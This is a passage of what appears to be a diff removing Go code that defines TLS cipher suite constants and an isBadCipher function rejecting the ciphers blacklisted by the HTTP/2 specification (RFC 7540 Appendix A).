cipher_TLS_ECDHE_PSK_WITH_NULL_SHA384 uint16 = 0xC03B - cipher_TLS_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC03C - cipher_TLS_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC03D - cipher_TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC03E - cipher_TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC03F - cipher_TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC040 - cipher_TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC041 - cipher_TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC042 - cipher_TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC043 - cipher_TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC044 - cipher_TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC045 - cipher_TLS_DH_anon_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC046 - cipher_TLS_DH_anon_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC047 - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC048 - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC049 - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04A - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04B - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04C - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04D - cipher_TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04E - cipher_TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04F - cipher_TLS_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC050 - cipher_TLS_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC051 - cipher_TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC052 - cipher_TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC053 - cipher_TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC054 - cipher_TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC055 - cipher_TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC056 - cipher_TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC057 - cipher_TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC058 - cipher_TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC059 - cipher_TLS_DH_anon_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05A - cipher_TLS_DH_anon_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05B - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05C - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05D - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05E - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05F - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC060 - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC061 - cipher_TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC062 - cipher_TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC063 - cipher_TLS_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC064 - cipher_TLS_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC065 - cipher_TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC066 - cipher_TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC067 - cipher_TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC068 - cipher_TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC069 - cipher_TLS_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06A - cipher_TLS_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06B - cipher_TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06C - cipher_TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06D - cipher_TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06E - cipher_TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06F - cipher_TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC070 - cipher_TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC071 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC072 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC073 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC074 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC075 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC076 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC077 - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC078 - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC079 - cipher_TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07A - cipher_TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07B - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07C - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07D - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07E - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07F - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC080 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC081 - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC082 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC083 - cipher_TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC084 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC085 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC086 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC087 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC088 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC089 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08A - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08B - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08C - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08D - cipher_TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08E - cipher_TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08F - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC090 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC091 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC092 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC093 - cipher_TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC094 - cipher_TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC095 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC096 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC097 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC098 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC099 - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC09A - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC09B - cipher_TLS_RSA_WITH_AES_128_CCM uint16 = 0xC09C - cipher_TLS_RSA_WITH_AES_256_CCM uint16 = 0xC09D - cipher_TLS_DHE_RSA_WITH_AES_128_CCM uint16 = 0xC09E - cipher_TLS_DHE_RSA_WITH_AES_256_CCM uint16 = 0xC09F - cipher_TLS_RSA_WITH_AES_128_CCM_8 uint16 = 0xC0A0 - cipher_TLS_RSA_WITH_AES_256_CCM_8 uint16 = 0xC0A1 - cipher_TLS_DHE_RSA_WITH_AES_128_CCM_8 uint16 = 0xC0A2 - cipher_TLS_DHE_RSA_WITH_AES_256_CCM_8 uint16 = 0xC0A3 - cipher_TLS_PSK_WITH_AES_128_CCM uint16 = 0xC0A4 - cipher_TLS_PSK_WITH_AES_256_CCM uint16 = 0xC0A5 - cipher_TLS_DHE_PSK_WITH_AES_128_CCM uint16 = 0xC0A6 - cipher_TLS_DHE_PSK_WITH_AES_256_CCM uint16 = 0xC0A7 - cipher_TLS_PSK_WITH_AES_128_CCM_8 uint16 = 0xC0A8 - cipher_TLS_PSK_WITH_AES_256_CCM_8 uint16 = 0xC0A9 - cipher_TLS_PSK_DHE_WITH_AES_128_CCM_8 uint16 = 0xC0AA - cipher_TLS_PSK_DHE_WITH_AES_256_CCM_8 uint16 = 0xC0AB - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CCM uint16 = 0xC0AC - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CCM uint16 = 0xC0AD - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 uint16 = 0xC0AE - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 uint16 = 0xC0AF - // Unassigned uint16 = 0xC0B0-FF - // Unassigned uint16 = 0xC1-CB,* - // Unassigned uint16 = 0xCC00-A7 - cipher_TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCA8 - cipher_TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCA9 - cipher_TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAA - cipher_TLS_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAB - cipher_TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAC - cipher_TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAD - cipher_TLS_RSA_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAE -) - -// isBadCipher reports whether the cipher is blacklisted by the HTTP/2 spec. -// References: -// https://tools.ietf.org/html/rfc7540#appendix-A -// Reject cipher suites from Appendix A. -// "This list includes those cipher suites that do not -// offer an ephemeral key exchange and those that are -// based on the TLS null, stream or block cipher type" -func isBadCipher(cipher uint16) bool { - switch cipher { - case cipher_TLS_NULL_WITH_NULL_NULL, - cipher_TLS_RSA_WITH_NULL_MD5, - cipher_TLS_RSA_WITH_NULL_SHA, - cipher_TLS_RSA_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_RSA_WITH_RC4_128_MD5, - cipher_TLS_RSA_WITH_RC4_128_SHA, - cipher_TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5, - cipher_TLS_RSA_WITH_IDEA_CBC_SHA, - cipher_TLS_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_RSA_WITH_DES_CBC_SHA, - cipher_TLS_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_DSS_WITH_DES_CBC_SHA, - cipher_TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_RSA_WITH_DES_CBC_SHA, - cipher_TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_DES_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_DES_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_anon_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_DH_anon_WITH_RC4_128_MD5, - cipher_TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_anon_WITH_DES_CBC_SHA, - cipher_TLS_DH_anon_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_KRB5_WITH_DES_CBC_SHA, - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_KRB5_WITH_RC4_128_SHA, - cipher_TLS_KRB5_WITH_IDEA_CBC_SHA, - cipher_TLS_KRB5_WITH_DES_CBC_MD5, - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_MD5, - cipher_TLS_KRB5_WITH_RC4_128_MD5, - cipher_TLS_KRB5_WITH_IDEA_CBC_MD5, - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5, - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5, - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_PSK_WITH_NULL_SHA, - cipher_TLS_DHE_PSK_WITH_NULL_SHA, - cipher_TLS_RSA_PSK_WITH_NULL_SHA, - cipher_TLS_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA, - cipher_TLS_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_WITH_NULL_SHA256, - cipher_TLS_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_PSK_WITH_RC4_128_SHA, - cipher_TLS_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_RC4_128_SHA, - cipher_TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_RC4_128_SHA, - cipher_TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DH_DSS_WITH_SEED_CBC_SHA, - cipher_TLS_DH_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_SEED_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DH_anon_WITH_SEED_CBC_SHA, - cipher_TLS_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_anon_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_anon_WITH_AES_256_GCM_SHA384, - cipher_TLS_PSK_WITH_AES_128_GCM_SHA256, - cipher_TLS_PSK_WITH_AES_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_AES_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_AES_256_GCM_SHA384, - cipher_TLS_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_PSK_WITH_NULL_SHA256, - cipher_TLS_PSK_WITH_NULL_SHA384, - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_NULL_SHA256, - cipher_TLS_DHE_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_NULL_SHA256, - cipher_TLS_RSA_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_EMPTY_RENEGOTIATION_INFO_SCSV, - cipher_TLS_ECDH_ECDSA_WITH_NULL_SHA, - cipher_TLS_ECDH_ECDSA_WITH_RC4_128_SHA, - cipher_TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_NULL_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_NULL_SHA, - cipher_TLS_ECDH_RSA_WITH_RC4_128_SHA, - cipher_TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_NULL_SHA, - cipher_TLS_ECDHE_RSA_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDH_anon_WITH_NULL_SHA, - cipher_TLS_ECDH_anon_WITH_RC4_128_SHA, - cipher_TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDH_anon_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_anon_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_ECDHE_PSK_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA256, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_anon_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_DH_anon_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_anon_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_PSK_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_PSK_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256, - 